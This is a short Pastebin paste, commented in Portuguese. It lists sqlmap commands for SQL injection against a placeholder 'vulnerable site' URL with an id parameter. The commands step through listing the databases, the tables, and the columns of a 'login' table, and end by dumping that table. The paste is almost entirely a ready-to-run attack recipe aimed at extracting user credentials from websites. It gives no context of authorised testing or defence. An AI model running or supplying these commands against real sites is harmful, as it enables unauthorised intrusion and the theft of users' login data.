Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 --dbs -- Comando para mostrar ah
- Database do site
- python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 -D 'database' --tables -- Comando
- para mostrar as tabelas do Database
- python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 -D 'database' -T "login" --columns
- -- Comando para mostar as colunas da tabela
- OU
- python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 -T "login" --dump
Advertisement
Add Comment
Please, Sign In to add comment